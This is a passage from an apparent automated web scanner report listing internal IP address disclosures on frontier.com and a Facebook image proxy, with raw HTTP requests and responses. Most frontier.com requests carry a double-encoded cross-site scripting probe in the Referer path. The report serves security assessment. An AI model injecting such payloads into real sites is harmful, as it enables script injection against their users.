GET /safe_image.php?d=AQB1IeZSUlg5LPS1&url=http%3A%2F%2Fecx.images-amazon.com%2Fimages%2FI%2F41DhHbBd-HL._SX120_SY90_.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.186.49
X-Cnection: close
Content-Length: 1917
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.11. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQBXZWprEKgvA9fN&url=http%3A%2F%2Fthumbnails.hulu.com%2F591%2F50118591%2F233441_120x90_generated.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.139.32
X-Cnection: close
Content-Length: 2740
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.12. http://frontier.com/AgentOrdering/customAppTabInfo/docobj.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/customAppTabInfo/docobj.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /AgentOrdering/customAppTabInfo/docobj.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8823CMWUY; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 669
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:50 GMT

function getDocObj(elem,parent){
if(document.layers)
{
   if(parent){
       return "document."+parent+".document."+elem;
   }
   else{
       return "document."+elem;
   }
}
else if(document.all){
       return
...[SNIP]...

19.13. http://frontier.com/AgentOrdering/customAppTabInfo/tabNavigation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/customAppTabInfo/tabNavigation.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /AgentOrdering/customAppTabInfo/tabNavigation.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8823CMWUY; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 4570
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:50 GMT

/* ********************************************************************************
CREATED 05/05 AXG987 per ER Rqst 10855

The file, tabNavigation.js, contains the JavaScript that makes the tab na
...[SNIP]...

19.14. http://frontier.com/AgentOrdering/customAppTabInfo/tabSetup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/customAppTabInfo/tabSetup.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /AgentOrdering/customAppTabInfo/tabSetup.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8823CMWWU; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 2645
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:04 GMT

/* ********************************************************************************
CREATED 06/06 AXG987

*********************************************************************************** */


...[SNIP]...

19.15. http://frontier.com/AgentOrdering/javascripts/AgentOrdering.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/javascripts/AgentOrdering.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /AgentOrdering/javascripts/AgentOrdering.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8823CMWUY; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 339
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:50 GMT

function AdvanceCursorByLengthChk(thisForm, presentObj, moveToName, maxLgth)
{
   if (presentObj.value.length == maxLgth)
   {
       setFocusToObj(thisForm, moveToName);
       return;
   }
}

function setF
...[SNIP]...

19.16. http://frontier.com/AgentOrdering/javascripts/validateinteger.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/javascripts/validateinteger.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /AgentOrdering/javascripts/validateinteger.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8823CMWWU; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 220
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:04 GMT

function Int_Function(theItem) {
   num_test = /\d/;
   for (i=0;i<theItem.value.length;i++) {
       if (!(num_test.test(theItem.value.charAt(i)))) {
           theItem.value = theItem.value.substring(0,i);
           r
...[SNIP]...

19.17. http://frontier.com/Controls/VirtualCode.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Controls/VirtualCode.ashx?pageid=73&origPath=%2ftopNav.css%2f HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8825CMWWY; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Date: Tue, 06 Sep 2011 12:01:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wwe4li45cd3p3qmxxunqye55; path=/; HttpOnly
Cache-Control: public
Expires: Tue, 06 Sep 2011 12:11:37 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 4620

@CHARSET "ISO-8859-1";


.cf:after {content: "."; display: block; height: 0; clear: both; visibility: hidden; }
.cf {display: inline-block;} /* for IE/Mac */
*html .cf { zoom: 1;display: block;
...[SNIP]...

19.18. http://frontier.com/Controls/VirtualCode.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Controls/VirtualCode.ashx?pageid=97&origPath=%2fNewStyleSheet.css%2f HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8824CMWUL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Date: Tue, 06 Sep 2011 12:03:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=55lskvumgowh0r45t52u43vf; path=/; HttpOnly
Cache-Control: public
Expires: Tue, 06 Sep 2011 12:14:22 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 22788

#iframeDiv {

}

#iframeDiv iframe {
width: 900px;
height: 1000px;
border: none;
overflow: auto;
}

body
{
MARGIN-TOP: 0px;
MARGIN-LEFT: 0px;
CO
...[SNIP]...

19.19. http://frontier.com/Js/formHelpers.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/formHelpers.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Js/formHelpers.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8823CMWWU; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 7911
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Jul 2011 16:59:13 GMT
Accept-Ranges: bytes
ETag: "806da59fe46cc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:04 GMT

var screenX=0;
var screenY=0;
document.onmousedown=getMouseXY;


function getMouseXY(e){
   if(document.all) e=event;
   screenX=e.screenX;
   screenY=e.screenY;
}
function fixDecimal(fld){
   va
...[SNIP]...

19.20. http://frontier.com/Js/jQuery/jquery-1.4.4.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/jQuery/jquery-1.4.4.min.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Js/jQuery/jquery-1.4.4.min.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8826CMWWL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 78768
Content-Type: application/x-javascript
Last-Modified: Fri, 17 Jun 2011 17:54:21 GMT
Accept-Ranges: bytes
ETag: "804f195172dcc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:07 GMT

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

19.21. http://frontier.com/Js/jQuery/jquery.maskedinput.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/jQuery/jquery.maskedinput.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Js/jQuery/jquery.maskedinput.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8824CMWWW; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 3548
Content-Type: application/x-javascript
Last-Modified: Mon, 22 Nov 2010 19:43:08 GMT
Accept-Ranges: bytes
ETag: "0eed37c7d8acb1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:06 GMT

.../*
   Masked Input plugin for jQuery
   Copyright (c) 2007-2009 Josh Bush (digitalbush.com)
   Licensed under the MIT license (http://digitalbush.com/projects/masked-input-plugin/#license)
   Version:
...[SNIP]...

19.22. http://frontier.com/Js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/s_code.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Js/s_code.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 29119
Content-Type: application/x-javascript
Last-Modified: Thu, 05 May 2011 05:01:12 GMT
Accept-Ranges: bytes
ETag: "8cabb274e1acc1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:53 GMT

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2011 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */

/* Specify the Report Suite ID(s) to track here */
//d
...[SNIP]...

19.23. http://frontier.com/Resources/3rdParty/HBX/hbx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/HBX/hbx.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Resources/3rdParty/HBX/hbx.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8825CMWWK; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 16427
Content-Type: application/x-javascript
Last-Modified: Mon, 22 Nov 2010 21:06:52 GMT
Accept-Ranges: bytes
ETag: "07e5d2f898acb1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

//hbx.js,HBX2.5,Copyright 1997 - 2008. Omniture, Inc. All Rights Reserved. Omniture is a registered trademark of Omniture, Inc. in the United States, Canada, Japan, and the European Community.
/* IN
...[SNIP]...

19.24. http://frontier.com/Resources/3rdParty/JQuery/jq.client.plugin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jq.client.plugin.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Resources/3rdParty/JQuery/jq.client.plugin.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8826CMWWM; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 2858
Content-Type: application/x-javascript
Last-Modified: Mon, 28 Feb 2011 13:38:16 GMT
Accept-Ranges: bytes
ETag: "054a9c04cd7cb1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

(function() {
   
   var BrowserDetect = {
       init: function () {
           this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
           this.version = this.searchVersion(navigator.userAgen
...[SNIP]...

19.25. http://frontier.com/Resources/3rdParty/JQuery/jquery-1.4.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery-1.4.2.min.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Resources/3rdParty/JQuery/jquery-1.4.2.min.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8825CMWWY; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 72328
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:07 GMT

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

19.26. http://frontier.com/Resources/3rdParty/JQuery/jquery-jtemplates.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery-jtemplates.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Resources/3rdParty/JQuery/jquery-jtemplates.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8824CMWUL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 9709
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

/* jTemplates 0.7.8 (http://jtemplates.tpython.com) Copyright (c) 2009 Tomasz Gloc */
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.
...[SNIP]...

19.27. http://frontier.com/Resources/3rdParty/JQuery/jquery-ui.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery-ui.min.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Resources/3rdParty/JQuery/jquery-ui.min.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8827CMWYI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 196163
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:08 GMT

/*!
* jQuery UI 1.8.5
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* http://docs.jqu
...[SNIP]...

19.28. http://frontier.com/Resources/3rdParty/JQuery/jquery.json-2.2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery.json-2.2.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Resources/3rdParty/JQuery/jquery.json-2.2.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8824CMWUL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 5769
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

/*
* jQuery JSON Plugin
* version: 2.1 (2009-08-14)
*
* This document is licensed as free software under the terms of the
* MIT License: http://www.opensource.org/licenses/mit-license.php

...[SNIP]...

19.29. http://frontier.com/images/FTRMain/frontier_Logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/FTRMain/frontier_Logo.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/FTRMain/frontier_Logo.jpg HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8827CMWYI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 4184
Content-Type: image/jpeg
Last-Modified: Mon, 25 Jul 2011 16:24:14 GMT
Accept-Ranges: bytes
